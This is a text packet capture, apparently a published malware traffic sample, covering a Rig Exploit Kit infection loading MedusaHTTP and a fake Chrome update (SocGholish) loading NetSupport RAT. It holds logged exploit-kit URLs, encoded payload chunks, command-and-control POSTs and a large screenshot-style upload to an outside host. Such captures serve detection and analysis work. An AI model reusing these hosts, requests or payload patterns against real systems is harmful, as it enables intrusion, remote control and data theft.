2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
E..U;……1... .........9Q5...P..............%....18FC78E29C1478DA645838C4DD2B2195. 2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0 E..4:.@....9 .....…..W..h………P…………..

Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=hea
rtfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspV
WdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvP
aqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqk
mbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a340349fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
d8a60655f3cb4fc982227159c509085d2a6a784994c199aaa40699e38b4dcdc613735b0b5d7b5f2e6a784996cbdd98a60457b7ff4fcbc41376590229861d2e665e26e69c98e9d367399abf34cbc6136319091b5a1d3d2a784ddaa6bbeca40647b3d80dcbc3411a3e616d4a5d2c6a73510a89dd96806925ac8223aeb7661235606d315d2e6a680996c1cfd8b54655f78728adb211734b490a085d2b38112efeb7df98a4065ceb5707cbc3561e297d60485d6e79384996c1dd91be9a1ff3cd0eb9a372073c0919084e6e6a7a4b96c3dd98a2423487aa4fcbc613631909100a34492f162dffa2b39aa60455fad3d181c615302b6c783c382e6a385ad6c3de8e121615f3cf09aab272715909fd581d2e61391ae2a2afecef683196b34fcbc613631909100a34492f162dffa2b39aa60455f3cb4d5bd253734d064901335a0f0a2ff7a0b8ddc872278a63598bc6117359a50d085d20652c00f8b7b8eac06736968e23bfb46a6f590919485d2e6a784d96c3ddd8b54655f3cb4dcbc4103a104d1b485d3f2a785996c3dd9aa0500192a921aec413ef4949195c5d2e6a7a4edf8cbbfed56321f1cb3dda86136b5909194a5767070825d1a6a9ecc37457f3c94dcbc60f6619090d470d67040c2ce4a5bcfbc3523491a728ffd353735b091970486e6a7646c28ab3ecc3743392a8289fa7711f3ccd5c4c5d2e6a784996c1dd98a69a45b3cb4dcbc61371534c773c2f5729173cf8b7df98a60655f3cf4dcbc611741c676d3a344b197a4994c3dd98a68e40b3cb43cc925e162d61762c552e6a784996c3dd98a40655f3cb5c8bc6137359091b4c1e410e1d4b96c3ccd8a60255f3cb4fcf827207380b194a5d286a73510a89dd94806925ac8e3cbea77f1a2d7019485d3e2a784b8447c8d8a6021996ad39c9c601f74c49194d0f470d103d94c3df98ad1ec9b9cb43eda9632c10677c39284f06113defc3dd98b64655f1d9c9de861377156c7f3c5f2e78fc5cd6c3d8cacf613d87c94dc9c6186bc54319
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…477b411a270ee4a6bcecc374019baa23cbc6136319091b5ad93b2a784ddaa6bbeca4064777de0dcbc3411a3e616d4a5d2c6a73510a89dd8e806925ac8c3faea767162b5d71293361183d38e3a2b198a60645b3cb4fd9420633590d552d3b5a68785b12d69d98a3543c94a339c9c61173521185025d224c1739c98fb8ebd5523d92a54dcbc60333590b0bcc486e6a7c05f3a5a99aa614d1e68b4dce947a14317d1b485f2e6160d5dcc3cebec9760abfae3eb8927b1237466b0d2c5b0b144996c3cdd8a6044777de0dcbc25f163f7d1b484faa7f38499391b4ffce7257f3c94da3d15373590919485d2e6a784996c3dd14b94655f3cb4dcbae0433590919485d507238499ec3dd98a60655f303108bc6c32e190935281d2e4e18099687bdd8a64e35b3cb01ab86133339491920016e6afc15d6c365c4e60655f3e94d4dde53731d09edb7f1362a780b96372248be4655b1cbb9343f0b33594a19bca219733849d4c32967c01f15f3894d3f399c6a19095a48a9d1a961099680dd6c59fa4cb3cb0ecb32ec544349190b5dda952853d6c39e9852f929e98b4d88c6e78ce11359481e2e9e87ba8c83dddba6f2aaddd00dcb851387a67d02085d6d6a8cb627d89d98e406a10c20568bc65173adf63c541d2e2878bd69a8c1d8a645550734e4d786133059fde692416e6a3b49623cd085e60616f33fb28adb53731309ecb729332a780396352207bb4655b9cbba34140e33594319b0a203743849dcc32467f81815f3814d31399c6d19095348a6d1a266099689dd6459014ab3cb06cb3bec41464919025dd0952656d6c3909859f955f3cc1984a479163a7d3f48c5722a784fd5b1b8f9d26356f3cb4dcbc61b73580191571d2e6a784dc5a6b1fea40657f3ef4d039a53735d4f6b2d382d6a784996c3d598a70eddec8b4dcbc617203c657f4a5d2c6a51498e5f9798af423c80bb22b8a35c155a0919485d2e6278489e4bc2d8a60655f79828a7a011735b09274889722a7845dfadb4ecef682687aa23a8
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…a31073d1165948552e68784996c3dd98a6020696a72bc9c61373484919495d2623163ae2a2b3fbc30455f1cb62cb924e3359065a24384f040d39dfadaeecc7683696c84dcbc6137351091840d5312a784996c78efdca6057f3c94de2c60bef1309100b314f190b1defb3b89ba61246b3cb45cbc71bfb464919485d2a391d25f0c1dd9aa632553b900dcbcf501f387a6a063c430f7b492ed19d98ae0657f3cb4dcbc613735d5a7c243b2c6a38f18483dd99a60754f1cb4fcbff1393024919431e420b0b3ad8a2b0fdef7556f3cb5d8bc61b735b0919485d2e6a784dc5a6b1fea406574bd90dcbc713771768742d5f2e687862969f81d8a60d169faa3eb89672013c676d4b5d3a7938499ec3dc98a60655f3cb4dcf95761f3f0b194a5d076a6429d6c3d4dbca6726808223ada9107359185948552e6b784996c3dd98a6020696a72bc9c61173750901d4172e663127e5b7bcf6c563069ab128c8c68f63190911485c2e6a784996c3dd9cf5633995c94dc9c62f7351695948516704102ce4aaa9ebe0743a9ec84dcbd6537351091b485d2e6a784996c78efdca6057f3cb59d8861372590f580b314f190b4b96c1dda3a6f635b3cb4086a3671b366d582c395c0f0b3a95c3dd89e6065df3c94dcbc6137359091d1b38420c7a498427ccd8a60755f7852ca6a311735b092248294f2a7844dba6a9f0c9621497af3faeb56070590908085d266a7a4996c3dd98a60651a0ae21adc41371e11b59485c2e6e3628fba6df98a40613f3572c8bc6193e3c7d712739600b152c95c3658ae6065df3c84dcbc6137359091d1b38420c7a4996c3ccd8

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
a60755f48a29afb476002a0b1908e53c2a784b96c2dc9aa60455cecb55578c1361087c78243448031d2dd5afbcebd548349eae4ecb7e01335901194a5d2e6a784996c3d9cbc36a33f1cb0d73d45373580918495f2e687873962bbcd8a60a139aae21af8777172b6c6a3b5e2e6a690996cbdd9aae8e4ab3cb4dcbc24016356f1b484fca7b384997c3d9d6c76b30f1cb4fcbfc132f3b4919441b470f142dd7a7b9eac37526f0cb4dda86137b590b11c0426e6a78499290b8f4c00455f1735f8bc612735d477825382c6a7a49d0c309c5e60659b4ae3982a867162b6f782b382d6a7859d6c3d598a50eddec8b4dcbc617203c657f4a5d3c2a6b0996c2dd9bef4f11f1cb6dcbc613735b091a073f4468784b96fddd18f84655e28c28bf8f7d073c7b7f293e4b2f163de4bade982a1215f3c34dc9c6137359091948597d0f142f94c3cfd8b54655f2cb4e828f5771590b19795d36f632498784b8ecef682196b92baaa57627386b752d5e2e726d0996cbdd99a60655f3cb4dcbc24016356f1b485f2e59788dc883dd90f3683c87852ca6a31073e11b5948552e68784996c3dd98a6020696a72bc9c653cb4b4919495d2f6b7a4994c3e998be9a1ff3c218a5af67203a66692d5e2ed26a0996cbdd9aa60655f3cb4dcbc24016356f1b481d9678384997c3dc99a40657f3f84d039b53735f4c683d3c42197b4996d39d98ae0657fb43528bc613735d5a7c243b2c6a70c18983dd99a6051a91a14fcbc4135859d944085d252d1d3ddea2aef0e5693196c84d57d6537351091840d5312a784996c78efdca6057f3c94df8c63f131909111c327d1e0a20f8a4de981e1415f3c34dc9ce9b6c19091948597d0f142f94c39d20b44655f2cb4ccac413715952196c3d6e6a691af7a5b8dbc76a39b6b32eaeb6671a36671a48753d2a784196c0d510b94655f3cb4998a37f155b0911c0426e6a79499a86a5fbc37621bca927aea56771590919591d…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z.. 2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0 E..(..@....V ..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1×1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1×1.gif?ss&ss2img HTTP/1.1
Accept: /
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.…. 2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010 E….t@…#. ..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. 